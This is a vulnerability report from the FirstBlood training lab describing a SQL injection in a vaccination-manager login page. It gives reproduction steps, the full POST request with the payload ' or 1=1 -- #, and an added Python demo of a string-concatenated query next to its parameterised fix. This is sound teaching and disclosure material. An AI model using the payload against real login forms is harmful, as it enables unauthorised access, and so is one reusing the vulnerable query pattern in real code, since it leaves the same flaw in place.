FirstBlood-#914: The login form for Vaccination Manager is vulnerable to SQL injection
This issue was discovered on FirstBlood v2



On 2021-10-30, vigilante Level 4 reported:

Summary:

The vaccination-manager login form is vulnerable to SQL injection.

After rooting the server through deserialization, I've searched through the vaccination-manager directory and found /vaccination-manager/login.php which was easy to exploit.

Steps to Reproduce:

  1. Navigate to /vaccination-manager/login.php
  2. Enter username "admin" and password ' or 1=1 -- #
  3. You'll be logged in as admin

POST /vaccination-manager/login.php HTTP/1.1
Host: 71db6da74f3c-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a1591376de74895e99a25819f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: https://71db6da74f3c-vigilante.a.firstbloodhackers.com
Referer: https://71db6da74f3c-vigilante.a.firstbloodhackers.com/vaccination-manager/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin&password=%27+or+1%3D1+--+%23

Supporting Material:

Impact

Someone without the admin's password can still log in due to SQL injection.

P1 CRITICAL

Endpoint: /vaccination-manager/login.php

Parameter: password

Payload: ' or 1=1 -- #


FirstBlood ID: 30
Vulnerability Type: SQL Injection

There is an SQL injection on the vaccination management portal login page which results in the user being able to log in as the administrator.
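To show why the password value from the report bypasses the check and how a parameterised query closes it, here is an added Python/sqlite3 example (not the portal's own login.php code). It assumes a users table with username and password columns; the table contents are constructed for the demonstration.

```python
import sqlite3

# The exact password value from the report, URL-decoded from the POST body.
PAYLOAD = "' or 1=1 -- #"


def build_db():
    """Constructed in-memory stand-in for the portal's database (assumed schema).
    Passwords are stored in clear text only to keep the example short; a real
    login table would hold password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "correct-horse"), ("nurse1", "battery-staple")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string concatenation, the pattern the report implies.
    The payload closes the password literal, adds 'or 1=1', and comments out
    the trailing quote, so every row matches and the first user (admin) is returned."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised statement: the driver passes the values separately from the
    SQL text, so the quote and comment characters in the payload are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, "admin", PAYLOAD))  # admin
    print("fixed:     ", login_fixed(db, "admin", PAYLOAD))       # None
```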